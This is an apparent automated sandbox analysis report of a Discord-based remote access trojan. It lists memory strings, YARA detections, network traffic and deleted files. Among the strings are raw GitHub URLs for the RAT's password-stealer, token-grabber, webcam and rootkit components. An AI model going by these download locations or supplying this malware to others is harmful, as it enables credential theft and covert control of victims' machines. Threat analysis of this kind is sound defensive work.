                                  Source: RuntimeBroker.exe, 00000007.00000002.1769750613.0000010D2EE3C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1933446910.0000016BB36FC000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4N
                                  Source: hacn.exe, 00000012.00000003.1828089329.0000016BB1AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: based.exe, 00000011.00000003.1876089664.000002A15E023000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                  Source: based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BD423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                  Source: based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                  Source: based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                  Source: based.exe, 00000011.00000003.1969462146.000002A15DB94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                  Source: based.exe, 00000011.00000003.2040687659.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1876089664.000002A15E000000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1991725190.000002A15E006000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15E002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                  Source: based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                  Source: based.exe, 00000011.00000003.1831935901.000002A15D886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                  Source: powershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                                  Source: hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: based.exe, 00000011.00000003.1929116625.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                                  Source: based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1904680044.000002A15E07E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E080000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                  Source: based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                  Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                  Source: based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: based.exe, 00000011.00000003.1929116625.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2004197771.000002A15E16C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2130901869.000002A15E16D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                                  Source: based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E07D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                  Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                  Source: based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1904680044.000002A15E07E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E080000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                  Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                  Source: based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                  Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                  Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                  Source: based.exe, 00000011.00000003.1916793337.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1886313619.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
                                  Source: based.exe, 00000011.00000003.1911260411.000002A15E1BA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                                  Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                  Source: based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724634863.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1788254823.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1790570421.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1816671465.000002A15D8CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                  Source: RuntimeBroker.exe, 00000007.00000003.1741045639.0000010D2F242000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1776664073.0000010D2F448000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1969519599.0000016BB3BF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                  Source: based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                                  Source: based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                  Source: unknownHTTPS traffic detected: 162.159.130.234:443 -> 192.168.2.4:49730 version: TLS 1.2
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                                  E-Banking Fraud

                                  barindex
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\KZWFNRXYKI.pdf
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\VLZDGUKUTZ.docx
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\NIKHQAIQAU.pdf
